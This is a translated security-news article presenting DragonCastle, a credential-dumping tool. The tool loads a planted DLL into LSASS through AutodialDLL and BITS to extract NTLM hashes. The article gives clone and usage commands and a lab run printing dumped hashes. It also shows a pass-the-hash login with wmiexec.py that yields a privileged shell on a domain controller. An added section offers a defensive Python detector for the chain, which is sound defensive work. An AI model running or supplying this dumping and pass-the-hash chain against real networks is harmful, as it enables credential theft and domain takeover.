
Extracting NTLM hashes from the LSASS process with DragonCastle

Author: FB客服 | Published 2023-04-26 15:12:19 | Column: FreeBuf

About DragonCastle

DragonCastle is a security tool that combines the AutodialDLL lateral-movement technique with a Security Support Provider (SSP). It is intended to help researchers extract NTLM hashes from the LSASS process.

The tool uploads a DLL to the target machine, then enables the Remote Registry service to modify the AutodialDLL registry entry and starts (or restarts) the BITS service. The svchost process hosting BITS loads the uploaded DLL, which sets AutodialDLL back to its default value and issues an RPC request that forces LSASS to load the same DLL as a Security Support Provider. Once LSASS has loaded the DLL, the DLL searches the process memory to extract the NTLM hashes and the key/IV.
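
Each step of that chain leaves a host-side artefact a defender can alert on: the Remote Registry service starting, a write to the AutodialDLL value, BITS starting shortly afterwards, the value being put back to its default, and lsass.exe mapping a module from outside System32. The detector below is an added example, not part of DragonCastle or of the original article. It assumes Sysmon-style fields (Event ID 13 with TargetObject/Details, Event ID 7 with Image/ImageLoaded) and System-log Event ID 7036 service-state messages, relies on the Windows defaults for the registry path (HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL) and its default data (rasadhlp.dll), and runs over constructed sample events; the module path C:\dump.dll is the one used in the article's usage example.

```python
"""Detection logic for the AutodialDLL -> BITS -> LSASS SSP loading chain.

Added defender-side example, not part of the DragonCastle project. It correlates
events from one host and raises a finding for each artefact the technique leaves:
  1. Sysmon Event ID 13 (registry value set) on AutodialDLL with anything other
     than the Windows default, rasadhlp.dll (and the later restore of the default).
  2. System log Event ID 7036 showing Remote Registry or BITS entering the
     running state within a few minutes of that change.
  3. Sysmon Event ID 7 (image loaded) where lsass.exe maps a DLL from outside
     %SystemRoot%\\System32.
Field names follow Sysmon's schema; the events below are constructed for the example.
"""
from datetime import datetime, timedelta
from typing import Dict, List

AUTODIAL_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL"
DEFAULT_AUTODIAL_DLL = "rasadhlp.dll"          # Windows default data for AutodialDLL
SYSTEM32_PREFIX = "c:\\windows\\system32\\"     # lower-cased prefix of expected LSASS modules
WATCHED_SERVICES = ("remote registry", "background intelligent transfer service")

# Constructed sample events (one host, chronological). "details" on event 13 is the
# new registry data; "image_loaded" on event 7 is the module the process mapped.
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2023-04-24T10:00:01", "event_id": 7036,
     "message": "The Remote Registry service entered the running state."},
    {"time": "2023-04-24T10:00:03", "event_id": 13, "image": r"C:\Windows\system32\svchost.exe",
     "target_object": AUTODIAL_VALUE, "details": r"c:\dump.dll"},
    {"time": "2023-04-24T10:00:05", "event_id": 7036,
     "message": "The Background Intelligent Transfer Service service entered the running state."},
    {"time": "2023-04-24T10:00:06", "event_id": 13, "image": r"C:\Windows\system32\svchost.exe",
     "target_object": AUTODIAL_VALUE, "details": DEFAULT_AUTODIAL_DLL},
    {"time": "2023-04-24T10:00:07", "event_id": 7, "image": r"C:\Windows\system32\lsass.exe",
     "image_loaded": r"c:\dump.dll"},
    {"time": "2023-04-24T10:00:08", "event_id": 7, "image": r"C:\Windows\system32\lsass.exe",
     "image_loaded": r"C:\Windows\system32\msv1_0.dll"},
]


def _ts(event: Dict) -> datetime:
    return datetime.fromisoformat(event["time"])


def _is_autodial_set(event: Dict) -> bool:
    return event["event_id"] == 13 and event.get("target_object", "").lower() == AUTODIAL_VALUE.lower()


def detect_autodial_ssp_chain(events: List[Dict], window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Return one finding per suspicious event; an empty list means nothing matched."""
    events = sorted(events, key=_ts)
    findings: List[Dict] = []

    # Pass 1: when was AutodialDLL pointed at something other than the default?
    tamper_times = [_ts(e) for e in events
                    if _is_autodial_set(e) and e.get("details", "").lower() != DEFAULT_AUTODIAL_DLL]

    def near_tamper(t: datetime) -> bool:
        return any(abs(t - tt) <= window for tt in tamper_times)

    # Pass 2: score every event against the chain.
    for ev in events:
        t, eid = _ts(ev), ev["event_id"]
        if _is_autodial_set(ev):
            value = ev.get("details", "")
            if value.lower() != DEFAULT_AUTODIAL_DLL:
                findings.append({"rule": "autodialdll_tampered", "time": ev["time"], "value": value})
            elif near_tamper(t):
                # Restoring the default right after a tamper is the clean-up step, not benign noise.
                findings.append({"rule": "autodialdll_restored_after_tamper", "time": ev["time"], "value": value})
        elif eid == 7036:
            msg = ev.get("message", "").lower()
            if "entered the running state" in msg:
                for svc in WATCHED_SERVICES:
                    if svc in msg and near_tamper(t):
                        findings.append({"rule": "service_started_near_tamper", "time": ev["time"], "value": svc})
        elif eid == 7 and ev.get("image", "").lower().endswith("\\lsass.exe"):
            loaded = ev.get("image_loaded", "")
            if not loaded.lower().startswith(SYSTEM32_PREFIX):
                findings.append({"rule": "lsass_loaded_module_outside_system32", "time": ev["time"], "value": loaded})
    return findings


if __name__ == "__main__":
    for f in detect_autodial_ssp_chain(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['time']} {f['value']}")
```

Service starts are only reported when they sit within the correlation window of an AutodialDLL tamper, so routine BITS activity on its own does not fire; the LSASS module-load rule stands alone, because a non-System32 module inside LSASS is worth a look regardless of how it got there.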

Supported operating system versions

Operating system version            Support status
Windows 10 version 21H2
Windows 10 version 21H1             Supported
Windows 10 version 20H2             Supported
Windows 10 version 20H1 (2004)      Supported
Windows 10 version 1909             Supported
Windows 10 version 1903             Supported
Windows 10 version 1809             Supported
Windows 10 version 1803             Supported
Windows 10 version 1709             Supported
Windows 10 version 1703             Supported
Windows 10 version 1607             Supported
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

Downloading the tool

The tool runs on Python 3, so first install and configure a Python 3 environment on your local machine. Clone the project source with the following command:

git clone https://github.com/mdsecactivebreach/DragonCastle.git

Usage

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -h
DragonCastle - @TheXC3LL
 
 
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
 
DragonCastle - A credential dumper (@TheXC3LL)
 
optional arguments:
  -h, --help             show this help message and exit
  -u USERNAME, --username USERNAME    valid username
  -p PASSWORD, --password PASSWORD    valid password
  -d DOMAIN, --domain DOMAIN    valid domain name
  -hashes [LMHASH]:NTHASH      NT/LM hashes
  -no-pass              don't ask for password
  -k                    use Kerberos authentication
  -dc-ip ip address     IP address of the domain controller
  -target-ip ip address   IP address of the target machine
  -local-dll dll to plant    local path of the DLL to upload
  -remote-dll dll location   remote path written into the AutodialDLL registry value

Usage example

The Windows server is at 192.168.56.20 and the domain controller at 192.168.56.10:

psyconauta@insulanova:~/Research/dragoncastle|⇒  python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL
 
 
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
 
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
 
============
[+] Deleting DLL
 
[^] Have a nice day!

The dumped hash for eddard.stark is then used with Impacket's wmiexec.py against the domain controller:

psyconauta@insulanova:~/Research/dragoncastle|⇒  wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark
 
C:\>whoami /priv
 
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
 
C:\>

Project address

DragonCastle:https://github.com/mdsecactivebreach/DragonCastle

Originally published 2023-04-24; shared from the FreeBuf WeChat public account.